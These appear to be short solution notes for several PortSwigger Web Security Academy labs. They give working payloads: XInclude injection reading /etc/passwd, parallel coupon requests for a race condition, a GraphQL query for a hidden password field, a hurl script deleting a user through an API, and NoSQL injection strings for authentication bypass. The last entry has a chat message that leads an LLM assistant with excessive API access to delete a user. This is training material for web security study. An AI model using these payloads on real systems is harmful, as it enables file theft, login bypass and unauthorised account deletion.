productId=<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>&storeId=2
https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
Solution:
Apply the promo code multiple times by sending 15 or so identical requests in parallel, so that several of them pass the 'already used' check before any of them records the use:
POST /cart/coupon HTTP/2
...
csrf=<CSRF_TOKEN>&coupon=PROMO20
https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts
Solution:
- Notice that the getAllPosts GraphQL query returns blog posts with sequential IDs, but id=3 is missing
- Use the InQL extension to modify the query and fetch the blog post with id=3; it contains no password yet
- Scan the GraphQL endpoint /graphql/v1 with Burp Scanner and notice in the schema that the BlogPost type has a postPassword field
- Use InQL to request the post with id=3 again, adding the postPassword field to the query
https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation
Solution:
- Log in with the provided creds
- Visit the API docs at /api/openapi.json and look for a way to delete a user
- Delete the user:
cat> r.hurl <<EOF
DELETE https://0aae00c9035d10ac82f4061600520093.web-security-academy.net/api/user/wiener
Cookie: session=LIa7duJhJjvnCe7uqczKBftChwe65RQJ
HTTP/2 200
EOF
hurl -k -x 127.0.0.1:8080 r.hurl --output -
https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-detection
Solution:
/filter?category='||1||'
https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication
Solution:
{"username":{"$regex":"admin.*"},"password":{"$ne":""}}
https://portswigger.net/web-security/llm-attacks/lab-exploiting-llm-apis-with-excessive-agency
Solution:
Go to: https://0ab9003504eb476384a87565007c0045.web-security-academy.net/chat
Send: I would like to delete user named carlos